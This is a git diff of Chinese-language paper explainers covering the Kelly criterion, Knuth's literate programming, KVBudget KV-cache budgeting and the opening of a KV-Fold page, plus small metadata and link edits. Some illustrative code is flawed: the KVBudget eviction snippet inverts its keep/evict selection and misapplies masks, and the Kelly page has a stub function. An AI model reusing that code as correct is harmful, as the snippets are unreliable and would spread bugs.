+q = 0.6,p = 0.4 → ℓ* = 0.2。模拟 10 000 局,对比 ℓ = 0.2 / ℓ = 1.0 / ℓ = 0.5: + +```python +import random +import math + +def simulate(q, ell, n_rounds=10_000, v0=1.0, seed=42): + random.seed(seed) + v = v0 + for _ in range(n_rounds): + win = random.random() < q + v *= (1 + ell) if win else (1 - ell) + if v < 1e-12: + v = 0.0 + break + g_empirical = math.log2(v / v0) / n_rounds if v > 0 else float("-inf") + return v, g_empirical + +q = 0.6 +g_theory = 1 + 0.4 * math.log2(0.4) + 0.6 * math.log2(0.6) # ≈ 0.029 + +for ell in (0.2, 0.5, 1.0): + v, g = simulate(q, ell) + print(f"ell={ell:.1f} final={v:.4f} G_hat={g:.4f}") + +print(f"G_theory (R) = {g_theory:.4f}") +``` + +典型输出:ℓ=0.2 时 G_hat 接近 0.029;ℓ=1.0 常中途破产(final≈0);ℓ=0.5 波动大且 G 偏低。**全仓最大化期望,却毁掉几乎必然的长期 G**——这就是 Kelly 论文要强调的悖论。 + +### 案例 2:多结果公平赔率 + 后验下注 + +三场赛马,真实概率 p = (0.5, 0.3, 0.2)。公平赔率 α_s = 1/p(s)。信道有时传错:收到 r 时后验 q(s|r) 已知。最优:把**当前本金的 q(s|r) 倍**押在 s 上(各结果互斥,总押注 ≤ 1)。 + +```python +import numpy as np + +p = np.array([0.5, 0.3, 0.2]) +alpha = 1.0 / p # 公平赔率 + +# 收到信号 r=0:后验略偏向马 0 +q_given_r = np.array([0.62, 0.25, 0.13]) +q_given_r /= q_given_r.sum() + +def growth_rate(p_joint, bet_fractions): + """bet_fractions[r][s] = 收到 r 时押在 s 上的本金比例""" + g = 0.0 + for r in range(len(bet_fractions)): + for s in range(len(p)): + # 简化:单信号 r,联合概率 p(s) 加权 + pass + return g + +# 单信号情形:每次按后验下注 +def one_bet_growth(q, alpha, p_true): + # 公平赔率下回报:押 a_s 在 s,若 s 发生则乘子为 1 + a_s*(alpha_s-1) = a_s*alpha_s + (1-sum a) + a = q.copy() # Kelly:a(s) = q(s|r) + cash = 1.0 - a.sum() + factors = cash + a * alpha + # 期望对数增长率 E_s[ log2( factor_s ) ] + return np.sum(p_true * np.log2(factors)) + +g_opt = one_bet_growth(q_given_r, alpha, p) +print(f"G per bet (nats base2): {g_opt:.4f}") + +# 互信息 I(S;R) 上界(需完整信道矩阵);此处展示后验比先验更「尖」时 G 为正 +g_prior = one_bet_growth(p, alpha, p) +print(f"G if bet prior (no info): {g_prior:.4f}") +``` + +无信息时应用先验 p 下注,G 为 0(公平市场无 edge)。有噪声内线使后验偏离先验时,G > 0。**信息的价值 = 对数财富增速的增量**。 + +### 案例 3:投资语境——edge 与 half-Kelly + +估计某策略胜率 p=0.55,赔率为 1:1(b=1):f* = 2×0.55 - 1 = **0.10**(押 10% 本金)。实务常用 **half-Kelly(5%)** 降低估计误差和路径波动——论文假设概率已知;真实市场要打折。 + +## 踩过的坑 + +1. **把 Kelly 当「这一把押多少能赢」**:Kelly 优化的是**渐近几乎必然**的指数增长率,短期方差极大,可能出现很长回撤。 +2. **全仓因为 E[资金] 更大**:二元公平例子中 ℓ=1 时 E[V_N] = (2q)^N V₀ 看似很美,但 P(破产)→1。Kelly 与「期望最大化」分道扬镳。 +3. **概率估错**:f* 对 p 极敏感;高估 edge 会导致**过度下注**,比保守更危险。实务普遍 fractional Kelly。 +4. **相关赌局**:论文假设**独立**重复。投资组合里资产相关时,简单 f* 不再最优,需多资产 Kelly 或均值-方差近似。 +5. **赔率含抽水**:公平赔率 α_s = 1/p(s) 是理想;真实体育/赌场有 vig,G 会下降,有时 ℓ*=0。 +6. **与 Shannon 容量混淆**:G_max = R 是在特定赌博模型下;**不等于**任意通信系统都能「变现」为等额收益——需要可重复下注、复利、赔率结构匹配。 + +## 适用 vs 不适用场景 + +**适用**: + +- 重复性独立(或弱相关)赌局/交易,可复利再投资 +- 有**概率优势**且赔率已知或可调 +- 分析「信息通道」的经济价值(侦听、低延迟行情、内幕信号——法律与伦理另论) +- 理解对数效用、熵与金融的桥梁 + +**不适用**: + +- **一次性**决策(买房、职业选择)——没有 N→∞ 复利语境 +- 概率/赔率**严重不确定**且无保守折扣 +- 存在**破产吸收壁**以外的约束(保证金、杠杆强平)——需修正模型 +- 多人博弈、市场冲击:你的下注改变赔率 + +## 与相关工作的关系 + +| 概念 | 关系 | +|------|------| +| [[shannon-1948]] | R、互信息 I(X;Y) 的定义来源;Kelly 赋予 R「无编码」的经济意义 | +| Von Neumann 效用 | Kelly 批评任意 cost function 过泛;下注模型内生于「人能获利」 | +| Thorp / 21 点 | 将 Kelly 用于可数牌面赌局,写进 *Beat the Dealer* | +| 现代 portfolio | 对数效用、CRRA、风险平价与 Kelly 家族相关;多资产需扩展 | +| Black-Scholes | 连续时间极限下 Kelly 与 growth-optimal portfolio 接轨 | + +## 历史小故事(可跳过) + +- Kelly 在 Bell Labs 与 Shannon 同僚,论文动机是回应同行「**不编码时传输率有何意义**」的困惑。 +- Shannon 和 Thorp 曾带 **Wearable 计算机** 去拉斯维加斯(未在 Kelly 原文,属后续传奇)。 +- 论文标题强调 **Information Rate**,不是「赌博公式」——投资界的「Kelly criterion」是后来命名。 +- Kelly 1965 年因脑溢血去世;年仅 41 岁。公式的影响远超过他个人的职业生涯长度。 + +## 小结 + +Kelly 1956 用「**有内线电话的赌徒**」讲清了一件事:**Shannon 信道传输率 = 最优复利下注下的最大指数增长率**。核心操作是每次押 **ℓ***(二元公平情形 ℓ* = 2q−1),而非全仓。它把信息论从「传比特」扩展到「传财富增速」,为量化投资与重复博弈提供了与熵同构的标尺。读原文时建议对照 [[shannon-1948]] 的二元对称信道容量公式——两个式子应当逐项重合,那是整篇论文最美的一处。 + +## 延伸阅读 + +- 原文 PDF:[Kelly 1956](https://www.princeton.edu/~wbialek/rome/refs/kelly_56.pdf) +- Shannon 1948:[[shannon-1948]] +- Thorp, *Beat the Dealer* (1962);Poundstone, *Fortune's Formula* (2005) +- Cover & Thomas, *Elements of Information Theory* — 第 16 章赌博与数据压缩的对偶 diff --git a/src/content/docs/papers/knuth-literate-1984.md b/src/content/docs/papers/knuth-literate-1984.md new file mode 100644 index 000000000..7aeeddce9 --- /dev/null +++ b/src/content/docs/papers/knuth-literate-1984.md @@ -0,0 +1,245 @@ +--- +title: Literate Programming — Knuth 1984 文学化编程与 WEB 系统 +来源: http://www.literateprogramming.com/knuthweb.pdf +日期: 2026-06-13 +分类: 其他 +子分类: 工程文化 +难度: 入门 +provenance: pipeline-v3 +--- + +## 是什么 + +1984 年,Donald E. Knuth 在 *The Computer Journal* 上发表 **Literate Programming**(文学化编程)。这篇论文不是又一种新语法糖,而是对「程序该怎么写、怎么读」的一次立场鲜明的翻转: + +> **程序首先是写给人类阅读的文献,其次才是交给机器执行的指令。** + +Knuth 在斯坦福写 TeX 排版系统时,把这套思想落成了 **WEB** 语言与工具链。论文用实例展示 WEB,并解释为什么它比「先写代码、后补注释」的传统流程更合理。 + +日常类比:想象你在写一本**带插图的菜谱**,而不是先写一张冷冰冰的配料表再另附说明。 + +- **传统编程**像先交厨房机器一份「步骤 1、步骤 2、步骤 3」的操作清单,说明书是事后贴的便利贴——读者要在「代码文件」和「文档文件」之间来回跳。 +- **文学化编程**像作者从第一页就按「为什么做这道菜 → 这一步的火候原理 → 具体用量与操作 → 和下一章如何衔接」来写;同一套源稿,印厂可以排出**给人看的精美菜谱**(WEAVE),后厨也可以抽出**可执行的配方卡**(TANGLE)。 + +Knuth 把复杂软件看成一张 **web(网)**:由许多简单片段编织而成,片段之间通过命名与引用相连。理解系统,就是沿着这张网读下去,而不是从 `main` 一路硬啃到底。 + +## 历史背景 + +| 时间 | 事件 | +|------|------| +| 1970s | Knuth 开发 TeX,需要同时维护算法与高质量文档 | +| 1983 | Stanford 技术报告 *The WEB System of Structured Documentation*(WEB 用户手册) | +| 1984 | 本文发表于 *The Computer Journal* 27(2),正式提出 literate programming 术语 | +| 1987 | Silvio Levy 将 WEB 改编为 **CWEB**,面向 C / C++ | +| 1992 | Knuth 出版文集 *Literate Programming*(CSLI Lecture Notes 27),收录本文及 TeX 程序节选 | + +同一时期,业界主流仍是「源码 + 独立文档」。结构化编程(Dijkstra)解决的是控制流纪律;Parnas 的信息隐藏解决的是模块边界。Knuth 补上的问题是:**人类读者按什么顺序、什么粒度,才能把程序当成连贯叙述来理解?** + +## 为什么重要 + +不理解文学化编程,下面这些事很难放在同一张图上: + +- 为什么 Knuth 的 TeX、METAFONT 源码本身可以成为排版精美的书籍(*Computers & Typesetting* 卷 B、D) +- 为什么「注释写得好」和「程序结构适合阅读」不是一回事——注释是外挂,文学化是**源文件即文档** +- 为什么 Jupyter Notebook、R Markdown、Swift Playground 等「叙述 + 可执行块」工具会让人感到熟悉 +- 为什么现代文档生成器(Sphinx、Rustdoc 内嵌示例、doctest)都在不同程度上追逐「单一真相来源」 + +论文的深层主张:**可维护性来自可读性;可读性来自作者对叙述顺序的掌控,而不是来自编译器要求的文件顺序。** + +## 核心概念 + +### 1. 两个受众、两种产物 + +WEB 把一份源文件同时服务两个目标: + +| 工具 | 输入 | 输出 | 服务对象 | +|------|------|------|----------| +| **WEAVE** | `.web` / `.w` | `.tex` → PDF | 人类读者(带索引、交叉引用、排版) | +| **TANGLE** | `.web` / `.w` | `.p` / `.c` 等 | 编译器 / 机器 | + +同一份 WEB 源是 **single source of truth**:不会出现「文档里的伪代码和真代码分叉」那种经典腐烂。 + +### 2. 程序是超文本,不是线性磁带 + +Knuth 早在万维网(WWW)之前就用了 **WEB** 这个名字。每个片段(section / chunk)有名字,可以: + +- 按**叙述顺序**排列(先讲动机,再讲数据结构,再讲主算法) +- 通过 **«chunk name»** 引用,让 TANGLE 按依赖关系拼出编译器需要的顺序 + +这类似「写百科词条」:读者从概述点进细节;机器则从依赖图拓扑排序出可编译单元。 + +### 3. 文学性:解释「为什么」,而不只是「是什么」 + +文学化编程鼓励: + +- 用自然语言交代不变式、复杂度、设计取舍 +- 在局部可见的范围内展示结构(不要逼读者翻十个文件才看见一个 `if` 的上下文) +- 把算法讲成故事,代码块是故事里的「公式」 + +Knuth 认为:**好的程序员本来就会写说明性文字**;WEB 只是把文字和代码锁在同一份可验证的源里。 + +### 4. WEB = 文档语言 + 编程语言 + +原型 WEB 组合的是 **TeX**(排版)与 **Pascal**(算法)。CWEB 则换成 **C/C++**。Neither alone is enough: + +- 纯 TeX 无法机械生成可执行系统 +- 纯 Pascal/C 的语法顺序是为编译器优化的,不是为读者优化的 + +### 5. 块(chunk)与 «引用» + +WEB/CWEB 源由交替的「TeX 叙述段」和「代码段」组成。代码段可命名,例如 `@=` … `@>`;别处用 `«Initialize the table»` 拉入。TANGLE 展开所有引用,生成完整源文件;WEAVE 则保留章节结构并生成索引。 + +### 6. 与结构化编程、信息隐藏的关系 + +- **结构化编程**:控制流应可推理(Dijkstra 反对随意 `goto`) +- **信息隐藏**:模块应隐藏易变决策(Parnas) +- **文学化编程**:**呈现顺序**应服务于人类理解,由作者编排,工具负责重排给机器 + +三者正交,可以同时遵守。 + +### 7. 代价与局限 + +Knuth 本人也承认:WEB **不是给初学者用的**——你需要同时熟悉 TeX 和宿主语言。工具链(WEAVE/TANGLE)增加构建步骤;团队若没有「文档即源码」的文化,收益会打折扣。 + +## 代码示例一:CWEB 风格的素数筛(概念示意) + +下面是一段 **简化示意**(非完整可编译文件),展示叙述与代码如何交织。`@c` 引入 C 代码,`@` 段标记 chunk 名: + +```cweb +@* Prime Numbers. +This program prints primes up to @{n@}, using Eratosthenes' sieve. +We explain the invariant before showing the code. + +@= +#define MAX 1000 + +@ The sieve marks composites in @|table[]|@. +@= +char table[MAX + 1]; +for (int i = 2; i <= n; i++) table[i] = 1; + +@
= +int main(void) { + int n = 100; + «Sieve setup»; + for (int p = 2; p <= n; p++) + if (table[p]) { + printf("%d\n", p); + for (int k = 2 * p; k <= n; k += p) table[k] = 0; + } + return 0; +} +``` + +**读者路径**:先看目标与不变式,再进 `main`,需要时跳进 `«Sieve setup»`。 + +**TANGLE 路径**:把 `«Sieve setup»` 展开进 `main` 之前,得到编译器习惯的扁平 `.c` 文件。 + +## 代码示例二:用 chunk 拆分「读入—处理—输出」 + +第二个例子强调 **叙述顺序 ≠ 编译顺序**。作者想先讲输出格式,再讲解析,TANGLE 仍可按引用拼出正确程序: + +```cweb +@* A tiny word-count filter. +We present sections in pedagogical order: output, then processing, then parsing. + +@= +void print_report(int words, int lines) { + printf("%d lines, %d words\n", lines, words); +} + +@= +int count_words(const char *line) { + int n = 0, in_word = 0; + for (; *line; line++) { + if (isspace((unsigned char)*line)) in_word = 0; + else if (!in_word) { in_word = 1; n++; } + } + return n; +} + +@= +int main(void) { + char buf[256]; + int lines = 0, words = 0; + while (fgets(buf, sizeof buf, stdin)) { + lines++; + words += count_words(buf); + } + print_report(words, lines); + return 0; +} +``` + +传统写法往往被迫 `main` 置顶;文学化写法允许 **先写 `print_report` 给读者看终点**,再在文末用 `«Driver»` 收束。现代语言里,你仍可用任意拓扑顺序组织源文件,但 WEB 在 **1980 年代就把「可重排片段 + 命名引用」工具化**了。 + +## 工具链一瞥 + +```text + ┌─────────────┐ + foo.w ──►│ WEAVE │──► foo.tex ──► PDF(给人读,带索引) + └─────────────┘ + ┌─────────────┐ + foo.w ──►│ TANGLE │──► foo.c ──► 编译器 ──► 可执行文件 + └─────────────┘ +``` + +CWEB 对应工具名为 **CWEAVE** / **CTANGLE**。Knuth 的 TeX、METAFONT、MMIX 模拟器等大型程序均以 `.w` 源维护,并出版与代码一致的纸质文献。 + +## 与现代工具的对照 + +| 思想 | WEB/CWEB (1984) | 现代近似物 | +|------|-----------------|------------| +| 叙述 + 代码同一源 | `.w` 文件 | Jupyter、R Markdown、Quarto | +| 从源生成排版文档 | WEAVE → TeX | Sphinx、MdBook、LaTeX `\lstinline` | +| 从源抽取可执行代码 | TANGLE | Literate Haskell、`noweb`、部分 build 脚本 | +| 命名片段与拼装 | `«chunk»` | 语言内模块、include,或自定义宏 | +| 交叉引用与索引 | WEAVE 自动生成 | IDE、LSP、doc 站内链 | + +差异在于:WEB 是为 **长时间维护的大型系统** 设计的工业级工具链,不是单次数据分析笔记本;但其哲学直接影响了后来「可执行文档」整条谱系。 + +## 论文中的 WEB 哲学摘录(意译) + +- 复杂软件最好被看作 ** delicately pieced together web**,理解局部与邻接关系即理解整体。 +- 程序员需要 **同时** 掌握排版语言与编程语言;各擅其一都不够。 +- 目标是 **state-of-the-art documentation** 与 **robust, portable** 程序并存,而非二选一。 +- 调试时间应显著下降——当你读的是连贯文章时,错误更容易定位在「哪一段叙述承诺了什么」。 + +## 常见误解 + +| 误解 | 澄清 | +|------|------| +| 「就是多写注释」 | 注释附属于代码;文学化源 **同时生成** 文档与程序,叙述结构是首要的 | +| 「反对结构化编程」 | Knuth 与 Dijkstra 争论过 `goto`,但文学化关注的是 **文档化与顺序**,不是破坏结构 | +| 「只适合 TeX 生态」 | 思想可移植;CWEB、`noweb`、Org Babel 等都是变体 | +| 「小项目用不上」 | 小项目收益小;TeX 级复杂度时,单一真相来源的收益才显现 | + +## 与 TeX 巨著的关系 + +Knuth 把 WEB 用于 **TeX: The Program**、**METAFONT: The Program** 等书:书中排版精美的代码列表,就是从同一份 `.web` WEAVE 出来的。这是文学化编程最硬核的「狗食」——不是幻灯片理念,而是数十年生产系统。 + +## 学习路径建议 + +1. **读本文 PDF**(约 12 页),抓住 WEB / WEAVE / TANGLE 三角关系。 +2. **浏览** Stanford CWEB 页面上的 [cweb.pdf](http://www.literateprogramming.com/cweb.pdf) 用户手册前几章,看真实 `@` 语法。 +3. **对照** 任意一篇 Jupyter 教程,思考:哪些块是「叙述」,哪些是「可被测试的 chunk」。 +4. **可选动手**:安装 `cweb`,编译官方 `cweave.w` / `ctangle.w` 迷你示例,体验一次 TANGLE 输出。 + +## 自测题 + +1. WEAVE 和 TANGLE 各解决什么问题?输入输出是什么? +2. 为什么 Knuth 说程序像 **web** 而不是 **tree**?(提示:多向引用与片段复用) +3. 叙述顺序与编译顺序不一致时,WEB 如何避免混乱? +4. 文学化编程与「结构化编程」「信息隐藏」分别解决哪一层问题? +5. 你今天用的哪些工具,可以看成文学化编程思想的「轻量化后代」? + +## 延伸阅读 + +- Donald E. Knuth, *Literate Programming*, CSLI Lecture Notes 27, 1992(文集,含修订版本文) +- Knuth & Levy, *The CWEB System of Structured Documentation*(CWEB 手册) +- D. E. Knuth, *TeX: The Program*(WEB 源 WEAVE 成书的范例) +- Norman Ramsey, **noweb** — 更轻量的文学化编程工具,影响许多课程作业模板 + +## 一句话总结 + +**Literate Programming 把程序写成给人读的文献,用 WEAVE 排出书籍、用 TANGLE 抽出机器码;Knuth 用 WEB 证明:文档与源码不必是两份真相,而可以是同一张用叙述编织的网。** diff --git a/src/content/docs/papers/kocher-spectre-2019.md b/src/content/docs/papers/kocher-spectre-2019.md index 8ab5d50f1..d9336f97e 100644 --- a/src/content/docs/papers/kocher-spectre-2019.md +++ b/src/content/docs/papers/kocher-spectre-2019.md @@ -169,5 +169,7 @@ function probe(index) { - [[cryptoverif-2008]] —— CryptoVerif — 让计算机直接证密码协议在真实计算模型下安全 - [[gpu-cache-coherence-2013]] —— GPU 缓存一致性 — 用时戳代替失效消息 - [[moesi-cache-coherence-1986]] —— Sweazey-Smith MOESI 1986 — 给多核 CPU 一份"谁手里有这块内存"的统一规则 +- [[rowhammer-2014]] —— Row Hammer — 不碰邻居也能把邻居的位翻过来 +- [[spectre-attack-2018]] —— Spectre Attacks — 推测执行如何绕过边界检查偷读内存 - [[xen-2003]] —— Xen 2003 — 让操作系统配合虚拟化,性能直接接近原生 diff --git a/src/content/docs/papers/kubernetes-2016.md b/src/content/docs/papers/kubernetes-2016.md index 7cead4de9..5cf904ed7 100644 --- a/src/content/docs/papers/kubernetes-2016.md +++ b/src/content/docs/papers/kubernetes-2016.md @@ -2,8 +2,8 @@ title: Kubernetes — 为什么选声明式 API 加协调环 来源: Burns, Grant, Oppenheimer, Brewer, Wilkes, Borg Omega and Kubernetes, ACM Queue 2016 日期: 2026-06-01 -子分类: 内核与虚拟化 -分类: 操作系统 +子分类: 系统综合 +分类: 基础设施 难度: 中级 provenance: pipeline-v3 --- diff --git a/src/content/docs/papers/kv-cache-budget-2026.md b/src/content/docs/papers/kv-cache-budget-2026.md new file mode 100644 index 000000000..8d6acb13d --- /dev/null +++ b/src/content/docs/papers/kv-cache-budget-2026.md @@ -0,0 +1,292 @@ +--- +title: KVBudget: Per-Request KV Cache Budgeting in vLLM-style Serving +来源: https://arxiv.org/abs/2605.30821 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +provenance: pipeline-v3 +--- + +# KVBudget: Per-Request KV Cache Budgeting in vLLM-style Serving + +## 一、先从生活场景说起 + +想象你在一家咖啡馆(这就是 GPU)里工作。厨房只有有限的位置(这就是显存)。 +每位顾客点一杯不同的咖啡(这代表一个请求),每杯咖啡需要占用不同的台面空间(这就是 KV Cache 的大小)。 + +在没有预算管理的咖啡馆,第一位顾客点了超大杯,占满了整个台面。后面的顾客只能等着, +或者咖啡师临时把前面顾客的咖啡倒掉——但这样第一位顾客的咖啡就毁了(上下文丢失,需要重算)。 + +KVBudget 的思路是:每位顾客在点单时就被分配了一个"预算"。 +这个预算决定了他能占用多少台面空间。如果预算用完了,系统会聪明地选择哪些咖啡该保留、哪些该"倒掉"(丢弃部分 KV 条目)。 + +这就是这篇论文的核心:**每个请求在运行前就被分配一个 KV Cache 的预算额度,系统据此决定保留哪些 key-value 对。** + +## 二、背景:为什么需要 KV Cache Budgeting? + +### 2.1 KV Cache 是什么? + +在大语言模型推理中,每个请求都会产生大量中间计算结果。具体来说: + +当模型读到第 1 个 token 时,会计算出对应的 key 和 value 向量。 +当读到第 2 个 token 时,又产生新的 key-value 对。 +这些 key-value 对被缓存起来(称为 KV Cache),因为后续生成 token 时还需要回头"查阅"它们。 + +**问题在于**:KV Cache 的大小随着上下文长度线性增长。如果同时服务 100 个请求,每个请求有 32K 的上下文, +那么 KV Cache 的总大小可能远超 GPU 显存。 + +### 2.2 vLLM 的 PagedAttention + +vLLM 用了一个聪明的方案:PagedAttention。 +就像操作系统的虚拟内存分页机制一样,它把 KV Cache 分成"页"来管理, +允许非连续分配,大幅减少了内存碎片和浪费。 + +**但 vLLM 有一个局限**:它假设每个请求需要完整的 KV Cache。 +如果显存不够,它会拒绝新请求,或者在极端情况下导致服务中断。 + +### 2.3 KVBudget 的思路 + +KVBudget 做了一个根本性的改变:**每个请求不再需要完整的 KV Cache。** +相反,系统给每个请求分配一个"预算"——最多可以占用多少 KV 条目。 + +如果请求的上下文超过了预算,系统就选择性地丢弃一部分 KV 条目。 +关键是:**丢弃哪些?用什么标准决定优先级?** + +这就是这篇文章要解决的核心问题。 + +## 三、核心概念 + +### 3.1 预算分配函数 + +系统需要一个函数,根据请求的特性来决定预算大小。 +常见的分配策略包括: + +- **静态分配**:每个请求分配固定数量的 KV 条目(比如 1024 个) +- **动态分配**:根据请求的当前上下文长度动态计算预算 +- **优先级分配**:高优先级请求获得更多预算 + +### 3.2 KV 条目的重要性评分 + +当需要丢弃 KV 条目时,系统需要评估每个条目的"重要性"。 +重要性通常与 token 对后续生成的贡献程度相关: + +- **注意力权重高的 token**:如果某个 token 在后续生成中被频繁"关注",它很重要 +- **位置信息**:开头和最近的 token 通常更重要(近因效应) +- **语义关键 token**:实体名称、数字等关键信息 + +### 3.3 预算超限时的 evict 策略 + +当请求的上下文超过预算时,系统执行 evict(驱逐): + +1. 计算所有 KV 条目的重要性分数 +2. 按照分数从低到高排序 +3. 丢弃低于预算限额的那些条目 +4. 更新元数据,确保后续访问不会出错 + +## 四、代码示例 + +### 示例 1:预算分配的伪代码 + +```python +class KVBudgetManager: + """管理每个请求的 KV Cache 预算""" + + def __init__(self, max_total_pages: int, page_size: int = 16): + # 总页数限制 + self.max_total_pages = max_total_pages + self.page_size = page_size + + # 每个请求的预算分配表 + self.budgets: dict[int, int] = {} + # 每个请求实际占用的页数 + self.allocated: dict[int, int] = {} + # 当前总占用 + self.current_usage = 0 + + def assign_budget(self, request_id: int, context_length: int, num_layers: int) -> int: + """ + 为请求分配 KV Cache 预算。 + + 参数: + request_id: 请求的唯一标识 + context_length: 请求的上下文长度(token 数) + num_layers: 模型的层数 + + 返回: + 分配的 KV 条目数量(budget) + """ + # 每个 token 产生的 KV 条目数 = 2 * num_layers(key 和 value) + total_kv_entries = 2 * num_layers * context_length + + # 策略:分配 64 页的预算(page_size=16 意味着 1024 个条目) + budget_pages = min(64, total_kv_entries // self.page_size + 1) + budget_entries = budget_pages * self.page_size + + self.budgets[request_id] = budget_entries + self.allocated[request_id] = 0 + return budget_entries + + def try_allocate(self, request_id: int, pages_needed: int) -> bool: + """尝试为请求分配页数。如果总占用超过限制,则触发 evict 策略。""" + if self.current_usage + pages_needed <= self.max_total_pages: + self.allocated[request_id] = pages_needed + self.current_usage += pages_needed + return True + + # 预算不足,需要 evict 其他请求 + return self.evict_others(pages_needed) + + def evict_others(self, pages_needed: int) -> bool: + """ + 驱逐其他请求的 KV Cache 以腾出空间。 + + 策略:优先驱逐预算已用满且上下文最早过期的请求。 + """ + pages_freed = 0 + + # 按"最近使用时间"排序,驱逐最久未使用的 + candidates = sorted( + [(rid, self.allocated[rid]) for rid in self.allocated], + key=lambda x: x[1], # 按已分配页数排序(可以换成 LRU 时间戳) + ) + + for request_id, allocated in candidates: + if pages_freed >= pages_needed: + break + pages_freed += allocated + self.current_usage -= allocated + del self.allocated[request_id] + + return pages_freed >= pages_needed +``` + +**解读**: + +这段代码展示了一个最基础的预算管理器。关键要点: + +- `assign_budget` 方法决定每个请求能分到多少 KV Cache +- `try_allocate` 检查总预算是否够用 +- 如果不够,`evict_others` 会"腾出空间" + +在真实实现中,evict 策略会更精细——不是简单丢弃整个请求的 KV Cache, +而是只丢弃超出预算的那些 KV 条目,保留重要的部分。 + +### 示例 2:KV 条目重要性评分与选择性丢弃 + +```python +import torch +import torch.nn.functional as F + +class SelectiveKVCache: + """ + 支持选择性保留 KV Cache 的缓存实现。 + 当超出预算时,根据重要性分数丢弃条目。 + """ + + def __init__(self, budget: int, page_size: int = 16): + self.budget = budget # 预算:最多保留的 KV 条目数 + self.page_size = page_size + self.pages: list[torch.Tensor] = [] # 存储 KV 页面的列表 + self.token_count = 0 # 已添加的 token 总数 + self.importance_scores = [] # 每个 token 的重要性分数 + + def append(self, key: torch.Tensor, value: torch.Tensor, attention_weights: torch.Tensor): + """ + 添加新的 KV 页面。 + + 参数: + key: [num_heads, num_tokens, head_dim] 的 key 矩阵 + value: [num_heads, num_tokens, head_dim] 的 value 矩阵 + attention_weights: [num_heads, num_tokens] 当前 token 对所有历史 token 的注意力权重 + """ + self.pages.append(key) + self.pages.append(value) + self.token_count += key.shape[1] + + # 根据注意力权重计算重要性分数 + # 注意力权重越高,说明这个 token 越重要,越不该被丢弃 + scores = attention_weights.mean(dim=0) # 对 heads 取平均 + self.importance_scores.append(scores) + + # 检查是否超出预算 + if self.token_count > self.budget: + self.evict_low_importance() + + def evict_low_importance(self): + """ + 丢弃重要性最低的 KV 条目,直到回到预算范围内。 + """ + if len(self.importance_scores) == 0: + return + + # 将所有重要性分数合并成一个一维列表 + all_scores = torch.cat(self.importance_scores) + + # 计算需要丢弃的条目数 + num_to_keep = self.budget + num_to_evict = len(all_scores) - num_to_keep + + if num_to_evict <= 0: + return + + # 找到重要性最低的 num_to_evict 个条目的索引 + _, indices = torch.topk(all_scores, k=num_to_keep, largest=False, sorted=False) + keep_mask = torch.ones_like(all_scores, dtype=torch.bool) + keep_mask[indices] = False # True = 保留,False = 丢弃 + + # 按页重新构建 KV Cache,只保留重要性高的条目 + # 注意:这里简化了实现,实际中需要更精细的页管理 + new_pages = [] + for page in self.pages: + # page 的维度是 [num_heads, num_tokens, head_dim] + # 只对 token 维度应用 mask + new_pages.append(page[:, keep_mask]) + + self.pages = new_pages + # 更新 token 计数 + self.token_count = sum(p.shape[1] for p in self.pages[:1]) # 简化 + self.importance_scores = [] +``` + +**解读**: + +这段代码的核心逻辑是: + +1. `append` 时,用注意力权重计算每个历史 token 的重要性 +2. 注意力权重大 = 后面的 token 经常"回头参考"它 = 它很重要 = 不应该被丢弃 +3. `evict_low_importance` 按分数排序,丢弃最不重要的一部分 + +**一个需要注意的细节**:在实际的 Transformer 中,KV Cache 是按层(layer)存储的。 +上面的代码做了简化,真实实现中需要对每一层都独立进行预算管理和 evict。 + +## 五、为什么这很重要? + +### 5.1 显存效率的提升 + +没有预算机制时,系统要么拒绝请求(降低吞吐量),要么耗尽显存(导致崩溃)。 +KVBudget 让系统能在有限显存下服务更多请求——即使每个请求只用了部分上下文。 + +### 5.2 对长上下文的支持 + +当上下文超长时(比如 128K token),KV Cache 可能占数十 GB。 +有了预算机制,系统可以把最重要的部分保留在 GPU 上,把次要部分放到 CPU 甚至磁盘上。 +这就像是手机的"后台管理":重要的 App 保留在内存中,不常用的被挂起。 + +### 5.3 多租户场景下的公平性 + +在多人同时使用大模型的场景下,预算机制可以确保: +- 付费用户获得更多 KV Cache 预算 +- 普通用户的请求不会挤占高优先级用户的资源 +- 系统整体不会因为个别超长请求而崩溃 + +## 六、总结 + +| 概念 | 说明 | 类比 | +|------|------|------| +| KV Cache | 存储历史 token 的 key-value 对 | 咖啡师记着每位顾客的订单 | +| 预算分配 | 给每个请求分配最大 KV 容量 | 给每位顾客分配台面大小 | +| 重要性评分 | 决定哪些 KV 条目该保留 | 哪些咖啡配方值得反复记住 | +| Evict | 超出预算时丢弃不重要的 KV | 台面满了,先倒掉没人要的咖啡 | + +**一句话总结**:KVBudget 用"预算"代替"全部保留"的思路, +让大模型服务在有限显存下跑得更快、更稳、更公平。 diff --git a/src/content/docs/papers/kv-fold.md b/src/content/docs/papers/kv-fold.md new file mode 100644 index 000000000..75d3726e1 --- /dev/null +++ b/src/content/docs/papers/kv-fold.md @@ -0,0 +1,356 @@ +--- +title: KV-Fold — 一步 KV 缓存递推实现长上下文推理 +来源: 'Nadali et al., "KV-Fold: One-Step KV-Cache Recurrence for Long-Context Inference", arXiv:2605.12471, 2026' +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:接力读一本厚书 + +想象你要读完一本 500 页的技术手册,但规定是:**每次只能翻开连续 10 页**,读完后必须把「到目前为止的理解」写在一张便签上,下次读新的 10 页时,先读便签,再读新页,然后把新理解追加到便签末尾。 + +Transformer 做长上下文推理时,面临类似约束: + +- **理想情况**:一次性把 128K token 全部喂进模型,每个新 token 都能 attend 到全部历史——显存和算力往往撑不住(全注意力分数矩阵可以大到 TB 级)。 +- **StreamingLLM 式做法**:便签只保留最近 1024 个 token + 几个「注意力 sink」——内存 bounded,但写在第 1 页的关键数字,读到第 500 页时可能已经不在便签上了。 +- **KV-Fold 的做法**:便签就是 **KV cache**——不压缩、不丢弃,每读完一个 chunk 就把新产生的 K/V **原样拼接**进累积 cache,传给下一步。像函数式编程里的 `foldl`:同一个「一步更新」反复套用,accumulator 越滚越大,但**早期 token 的 K/V 始终还在**,后面还能通过 attention 精确找回来。 + +论文的核心发现是:这种递推 surprisingly **稳定**——相对「一次性全上下文 forward」的预测分布,误差(drift)在前几步略升,然后进入**平台期**,深度到 511 步也不继续恶化;在 needle-in-a-haystack 上,Llama-3.1-8B 在 16K–128K、深度 511 的设定下 **152/152 次精确检索成功**,单卡 40GB A100 可跑完。 + +--- + +## 是什么 + +**KV-Fold** 是一种 **training-free**(无需微调、不改架构)的长上下文**推理协议**,把预训练 Transformer 的 KV cache 当作跨 chunk 